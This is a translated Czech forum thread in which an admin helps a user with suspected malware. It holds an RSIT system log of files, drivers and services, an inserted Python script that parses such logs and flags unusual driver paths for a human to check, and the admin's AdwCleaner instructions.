.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2018-08-25 18:56:57 ----D---- C:\rsit
2018-08-25 18:56:57 ----D---- C:\Program Files\trend micro
2018-08-25 11:52:55 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files\DESIGNER
2018-08-22 16:14:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-15 16:29:03 ----D---- C:\Users\eciO\AppData\Roaming\LibreOffice
2018-08-15 15:32:24 ----A---- C:\Windows\SYSWOW64\mshtml.dll
2018-08-15 15:32:24 ----A---- C:\Windows\system32\mshtml.dll
2018-08-15 15:32:23 ----A---- C:\Windows\SYSWOW64\ieframe.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\wininet.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\jscript9.dll
2018-08-15 15:32:23 ----A---- C:\Windows\system32\ieframe.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\wininet.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\msi.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\jscript9.dll
2018-08-15 15:32:22 ----A---- C:\Windows\SYSWOW64\iertutil.dll
2018-08-15 15:32:22 ----A---- C:\Windows\system32\win32k.sys
2018-08-15 15:32:22 ----A---- C:\Windows\system32\urlmon.dll
2018-08-15 15:32:22 ----A---- C:\Windows\system32\ntoskrnl.exe
2018-08-15 15:32:22 ----A---- C:\Windows\system32\drivers\tcpip.sys
2018-08-15 15:32:22 ----A---- C:\Windows\system32\authui.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\webcheck.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\vbscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\urlmon.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\t2embed.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\StructuredQuery.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\msiexec.exe
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\msfeeds.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\jscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\ieapfltr.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\hlink.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\GdiPlus.dll
2018-08-15 15:32:21 ----A---- C:\Windows\SYSWOW64\fontsub.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\win32spl.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\vbscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\StructuredQuery.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\samsrv.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\puiobj.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\ntdll.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msiexec.exe
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msi.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\msfeeds.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\jscript.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\iertutil.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\ieapfltr.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\hlink.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\GdiPlus.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\fontsub.dll
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\refs.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\ndis.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\dxgkrnl.sys
2018-08-15 15:32:21 ----A---- C:\Windows\system32\drivers\appid.sys
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\jscript9diag.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\inetcomm.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\iedkcs32.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\certcli.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\authui.dll
2018-08-15 15:32:20 ----A---- C:\Windows\SYSWOW64\actxprxy.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\webcheck.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\t2embed.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\jscript9diag.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\inseng.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\inetcomm.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\ieui.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\ie4uinit.exe
2018-08-15 15:32:20 ----A---- C:\Windows\system32\dpapisrv.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\certcli.dll
2018-08-15 15:32:20 ----A---- C:\Windows\system32\actxprxy.dll
2018-08-15 15:16:45 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-12 11:18:44 ----D---- C:\Users\eciO\AppData\Roaming\Unreal Engine
2018-08-10 15:50:01 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-08 17:59:13 ----D---- C:\FRST
2018-08-07 08:35:19 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
2018-08-06 09:14:14 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
2018-08-05 21:18:39 ----D---- C:\Windows\SYSWOW64\D374-4DEA-9751-2D08BC721AA7}
2018-08-05 21:09:05 ----D---- C:\Games
2018-08-05 21:01:50 ----D---- C:\Users\eciO\AppData\Roaming\Easeware
2018-08-05 20:02:41 ----A---- C:\Windows\system32\drivers\aswHdsKe.sys
2018-08-05 20:02:39 ----A---- C:\Windows\system32\aswBoot.exe
2018-08-05 19:48:02 ----D---- C:\Users\eciO\AppData\Roaming\uTorrent
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\vcruntime140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\vccorlib140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\msvcp140_1.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\msvcp140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\SYSWOW64\concrt140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\vcruntime140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\vccorlib140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\msvcp140_1.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\msvcp140.dll
2018-07-30 09:18:30 ----A---- C:\Windows\system32\concrt140.dll

======List of files/folders modified in the last 1 month======

2018-08-25 18:57:02 ----D---- C:\Windows\Prefetch
2018-08-25 18:56:57 ----RD---- C:\Program Files
2018-08-25 18:50:00 ----D---- C:\Windows\Temp
2018-08-25 18:00:00 ----D---- C:\Windows\system32\sru
2018-08-25 17:50:12 ----D---- C:\Windows\SysWOW64
2018-08-25 17:50:02 ----SHD---- C:\Windows\Installer
2018-08-25 17:50:02 ----SHD---- C:\Config.Msi
2018-08-25 14:25:52 ----RD---- C:\Windows\System32
2018-08-25 14:25:52 ----D---- C:\Windows\Inf
2018-08-25 14:25:52 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-08-25 14:19:47 ----D---- C:\ProgramData\NVIDIA
2018-08-25 14:09:35 ----D---- C:\Program Files\Microsoft Office
2018-08-25 12:25:55 ----D---- C:\Windows\Microsoft.NET
2018-08-25 11:52:55 ----D---- C:\Windows
2018-08-24 21:52:06 ----D---- C:\Users\eciO\AppData\Roaming\TS3Client
2018-08-24 16:02:48 ----D---- C:\Windows\system32\drivers
2018-08-24 11:55:09 ----SHD---- C:\System Volume Information
2018-08-23 12:02:46 ----D---- C:\Windows\system32\Tasks
2018-08-23 10:05:31 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files\microsoft shared
2018-08-23 10:05:20 ----D---- C:\Program Files\Common Files
2018-08-22 16:14:03 ----D---- C:\Program Files (x86)\Overwolf
2018-08-21 10:48:10 ----D---- C:\Windows\system32\config
2018-08-20 14:09:49 ----D---- C:\Windows\WinSxS
2018-08-20 14:07:24 ----D---- C:\Windows\system32\catroot2
2018-08-20 14:04:11 ----D---- C:\Windows\system32\DriverStore
2018-08-19 22:05:37 ----D---- C:\Windows\system32\wdi
2018-08-19 12:00:32 ----D---- C:\Windows\rescache
2018-08-19 12:00:31 ----RSD---- C:\Windows\assembly
2018-08-15 21:16:33 ----RD---- C:\Windows\ToastData
2018-08-15 21:16:33 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-08-15 21:16:33 ----D---- C:\Windows\system32\cs-CZ
2018-08-15 21:16:33 ----D---- C:\Program Files\Internet Explorer
2018-08-15 21:16:33 ----D---- C:\Program Files (x86)\Internet Explorer
2018-08-15 21:16:32 ----D---- C:\Windows\apppatch
2018-08-15 16:28:39 ----D---- C:\Users\eciO\AppData\Roaming\Seznam.cz
2018-08-15 16:28:08 ----RSD---- C:\Windows\Fonts
2018-08-15 15:49:30 ----D---- C:\Windows\CbsTemp
2018-08-15 15:49:00 ----D---- C:\Windows\system32\MRT
2018-08-15 15:48:04 ----D---- C:\Windows\debug
2018-08-15 15:48:01 ----AC---- C:\Windows\system32\MRT.exe
2018-08-14 08:53:13 ----D---- C:\Windows\AppReadiness
2018-08-12 18:34:40 ----D---- C:\Users\eciO\AppData\Roaming\vlc
2018-08-12 11:18:35 ----D---- C:\Windows\Logs
2018-08-12 11:18:33 ----D---- C:\ProgramData\Package Cache
2018-08-11 19:27:32 ----D---- C:\Program Files\Epic Games
2018-08-09 11:54:05 ----D---- C:\Windows\SoftwareDistribution
2018-08-08 17:18:26 ----D---- C:\Windows\Panther
2018-08-08 17:18:26 ----D---- C:\Windows\Minidump
2018-08-08 17:13:21 ----D---- C:\Windows\Tasks
2018-08-08 17:13:05 ----D---- C:\ProgramData\ProductData
2018-08-08 17:05:53 ----D---- C:\AdwCleaner
2018-08-08 13:43:21 ----RD---- C:\Program Files (x86)
2018-08-08 13:43:21 ----D---- C:\ProgramData\AVAST Software
2018-08-06 10:20:55 ----D---- C:\Program Files\WinRAR
2018-08-05 19:54:52 ----HD---- C:\Program Files\WindowsApps
2018-08-04 01:46:42 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-07-19 201328]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-07-19 346664]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-07-19 59592]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-07-19 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-07-19 381584]
R0 iaStorA;iaStorA; C:\Windows\System32\drivers\iaStorA.sys [2017-08-14 1467912]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-07-19 197160]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-07-19 229392]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-08-05 239680]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-07-19 111872]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-07-19 1027728]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-08-24 465640]
R1 HWiNFO32;HWiNFO32/64 Kernel Driver; \??\C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [2017-08-14 27552]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-07-19 159640]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-07-19 211160]
R3 ETDSMBus;ETDSMBus; C:\Windows\System32\drivers\ETDSMBus.sys [2017-08-14 32840]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys [2014-12-03 4290520]
R3 ISCT;@oem9.inf,%ISCT.DeviceDesc%;Intel(R) Smart Connect Technology Device Driver; C:\Windows\System32\drivers\ISCTD.sys [2017-08-14 44744]
R3 MEIx64;@oem13.inf,%TEE_SvcDesc%;Intel(R) Management Engine Interface ; C:\Windows\System32\drivers\TeeDriverW8x64.sys [2017-08-14 204920]
R3 NVHDA;@oem29.inf,%NVHDA.SvcDesc%;Service for NVIDIA High Definition Audio Driver; C:\Windows\system32\drivers\nvhda64v.sys [2017-11-09 233904]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2017-11-09 16771696]
R3 NVVADARM;@oem31.inf,%NVVADARM.SvcDesc%;NVIDIA Miracast Audio; C:\Windows\system32\drivers\nvvadarm.sys [2017-11-09 54896]
R3 RTL8168;@oem21.inf,%rtl8168.Service.DispName%;Realtek 8168 NT Driver; C:\Windows\system32\DRIVERS\Rt630x64.sys [2014-08-26 874712]
S3 ArcSoftKsUFilter;ArcSoft Magic-I Visual Effect; C:\Windows\system32\DRIVERS\ArcSoftKsUFilter.sys [2008-04-03 19968]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-07-19 46976]
S3 cpuz140;cpuz140; \??\C:\Users\eciO\AppData\Local\Temp\cpuz140\cpuz140_x64.sys []
S3 dg_ssudbus;@oem23.inf,%ssud.Service.DeviceDesc%;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudbus.sys [2017-05-18 131984]
S3 MSICDSetup;MSICDSetup; \??\E:\CDriver64.sys []
S3 NTIOLib_1_0_C;NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys []
S3 ssudmdm;@oem24.inf,%ssud.Service.Name%;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.); C:\Windows\system32\DRIVERS\ssudmdm.sys [2017-05-18 166288]
S3 usbaudio;@wdma_usb.inf,%USBAudio.SvcDesc%;Ovladač zvuků USB (WDM); C:\Windows\system32\drivers\usbaudio.sys [2014-03-18 121088]
S3 usbvideo;@usbvideo.inf,%USBVideo.SvcDesc%;Zobrazovací zařízení USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2014-06-21 212736]
S3 WinUsb;@wpdmtp.inf,%WinUsb.SvcDesc%;WinUsb; C:\Windows\system32\DRIVERS\WinUsb.sys [2015-10-10 78848]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2017-03-28 82640]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-07-19 322464]
R2 ClickToRunSvc;Microsoft Office Click-to-Run Service; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2018-08-19 9644000]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2014-10-29 38792]
R2 MSI_Trigger_Service;MSI_Trigger_Service; C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe [2013-09-26 30240]
R2 NVDisplay.ContainerLocalSystem;NVIDIA Display Container LS; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [2017-10-27 462968]
R2 NvTelemetryContainer;NVIDIA Telemetry Container; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [2017-08-14 449984]
R2 uCamMonitor;CamMonitor; C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe [2011-07-15 106496]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-07-19 7780400]
R3 Steam Client Service;Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [2018-08-09 1683744]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-14 107848]
S3 ACDaemon;ArcSoft Connect Daemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [2010-03-18 113152]
S3 BEService;BattlEye Service; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2018-06-19 6875688]
S3 BthHFSrv;@%SystemRoot%\System32\BthHFSrv.dll,-103; C:\Windows\System32\svchost.exe [2014-10-29 38792]
S3 EasyAntiCheat;EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [2018-03-08 774272]
S3 FontCache3.0.0.0;@%SystemRoot%\system32\PresentationHost.exe,-3309; C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe [2013-08-03 43696]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-14 107848]
S3 ose64;Office 64 Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2018-07-30 261200]
S3 OverwolfUpdater;Overwolf Updater Windows SCM; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2018-08-15 2308424]
S3 uSHAREitSvc;SHAREit Hotspot Service; C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.Service.exe [2017-09-11 33224]

-----------------EOF-----------------
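An added triage example (editor's code, not part of this thread, of RSIT or of Avast): the Python below parses the "created", "drivers" and "services" sections in the RSIT format shown in the log above and applies a few checks an analyst would otherwise do by eye: a kernel driver or service binary that loads from a user profile, Temp or a non-C: drive, an entry for which RSIT printed empty brackets instead of a date and size, and a GUID-style folder name under C:\Windows that is not a well-formed GUID. The embedded sample is an excerpt copied from the log above; the heuristics, the reading of empty brackets as "no date/size recorded", the treatment of C: as the system drive and the function names are my assumptions. Hits such as the CPU-Z driver in Temp or the MSI driver-CD files on E: may be perfectly legitimate, which is why the output is a to-check list for a human, not a verdict.

```python
"""Triage helper for RSIT logs (added example; heuristics are the editor's assumptions)."""
import re

# Constructed excerpt: lines copied from the log above, in RSIT's own format.
SAMPLE_LOG = r"""
======List of files/folders created in the last 1 month======

2018-08-15 15:16:45 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-06 09:14:14 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
2018-08-05 21:18:39 ----D---- C:\Windows\SYSWOW64\D374-4DEA-9751-2D08BC721AA7}
2018-08-05 20:02:41 ----A---- C:\Windows\system32\drivers\aswHdsKe.sys

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-07-19 381584]
R3 ISCT;@oem9.inf,%ISCT.DeviceDesc%;Intel(R) Smart Connect Technology Device Driver; C:\Windows\System32\drivers\ISCTD.sys [2017-08-14 44744]
S3 cpuz140;cpuz140; \??\C:\Users\eciO\AppData\Local\Temp\cpuz140\cpuz140_x64.sys []
S3 MSICDSetup;MSICDSetup; \??\E:\CDriver64.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-07-19 322464]
S3 uSHAREitSvc;SHAREit Hotspot Service; C:\Program Files (x86)\SHAREit Technologies\SHAREit\SHAREit.Service.exe [2017-09-11 33224]

-----------------EOF-----------------
"""

SECTION_RE = re.compile(r"^======List of (\w+)")
# "R0 name;description; path [date size]"; the description may itself contain ';'.
ENTRY_RE = re.compile(
    r"^(?P<state>[RS])(?P<start>[0-4]) (?P<name>[^;]+);(?P<desc>.*); "
    r"(?P<path>.+?) \[(?P<meta>[^\]]*)\]\s*$"
)
# "2018-08-15 15:16:45 ----D---- C:\path"
FILE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<attrs>-+[A-Z]*-+) (?P<path>.+)$"
)
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
NT_PREFIX = "\\??\\"  # RSIT prints kernel object paths as \??\C:\...
USER_DIRS = ("\\users\\", "\\temp\\", "\\appdata\\")  # assumed "odd" homes for a driver


def parse_rsit(text):
    """Split an RSIT log into its files / drivers / services entries."""
    sections = {"files": [], "drivers": [], "services": []}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        head = SECTION_RE.match(line)
        if head:
            # Both the "created" and "modified" lists start with "List of files".
            current = head.group(1) if head.group(1) in sections else None
            continue
        if not line or current is None:
            continue
        if current == "files":
            m = FILE_RE.match(line)
            if m:
                sections["files"].append(m.groupdict())
            continue
        m = ENTRY_RE.match(line)
        if m:
            entry = m.groupdict()
            if entry["path"].startswith(NT_PREFIX):
                entry["path"] = entry["path"][len(NT_PREFIX):]
            sections[current].append(entry)
    return sections


def classify_path(path, kind):
    """Reason string if a driver/service load path looks unusual, else None."""
    low = path.lower()
    if low[1:2] != ":":
        return None  # \SystemRoot\... style path: left for the reader
    if low[:2] != "c:":  # assumption: C: is the system drive (as the log header says)
        return f"loads from non-system drive {path[:2]} (removable/optical media?)"
    if any(d in low for d in USER_DIRS):
        return "loads from a user profile / Temp directory"
    if kind == "drivers" and "\\windows\\" not in low:
        return "kernel driver outside C:\\Windows"
    return None


def triage(text):
    """Apply the heuristics and return one finding string per hit."""
    parsed = parse_rsit(text)
    findings = []
    for kind in ("drivers", "services"):
        for e in parsed[kind]:
            label = f"{kind[:-1]} {e['name']} ({e['state']}{e['start']}) -> {e['path']}"
            if not e["meta"].strip():
                # Empty brackets: RSIT printed no date/size for the binary.
                findings.append(label + ": no date/size recorded for the file")
            reason = classify_path(e["path"], kind)
            if reason:
                findings.append(label + ": " + reason)
    for item in parsed["files"]:
        leaf = item["path"].rsplit("\\", 1)[-1]
        is_dir = "D" in item["attrs"]
        if is_dir and ("{" in leaf or leaf.endswith("}")) and not GUID_RE.match(leaf):
            findings.append(f"folder {item['path']}: GUID-style name is not a well-formed GUID")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Run it as-is to print the findings for the sample, or read a saved RSIT log into a string and pass it to triage(); anything it prints still has to be confirmed against the file on disk (publisher signature, hash) before it is treated as malicious.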

Rudy
Site Admin

Re: Please help me remove a virus

#2 Post by Rudy »

Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Windows XP just double-click it)
click Scan now, then Clean and Repair
after the reboot a log will pop up (otherwise find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply
Post questions and logs only in your own threads. Private messages, ICQ and e-mail are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved the thread will be locked, as it will be if it is inactive for more than 14 days. If you want the thread reopened, write to the e-mail address above.

Kate34
Visitor

Re: Please help me remove a virus

#3 Post by Kate34 »

Hello and thank you too,

neither of the links works (the browser closes and a message pops up saying that the Google application did not shut down properly..). I have AdwCleaner on the PC, but as I have just found out it won't start, neither by double-clicking nor via "Open"; the desktop just reloads. I don't see a "Run as administrator" option in my AdwCleaner. I am also finding now that even typing the word adware into the search engine throws me back to the desktop. The browser closes.

Rudy
Site Admin

Re: Please help me remove a virus

#4 Post by Rudy »

The links work (I tried them); try a different browser, e.g. IE.

Kate34
Visitor

Re: Please help me remove a virus

#5 Post by Kate34 »

It doesn't work, not even in IE. Thanks anyway for trying; I'll invite someone over to sit down with it.

Have a nice evening, Kateřina

Rudy
Site Admin

Re: Please help me remove a virus

#6 Post by Rudy »

Try this one:
adwcleaner_6.043.rar (attachment, 3.75 MiB)
Ignore the prompt to download a newer version.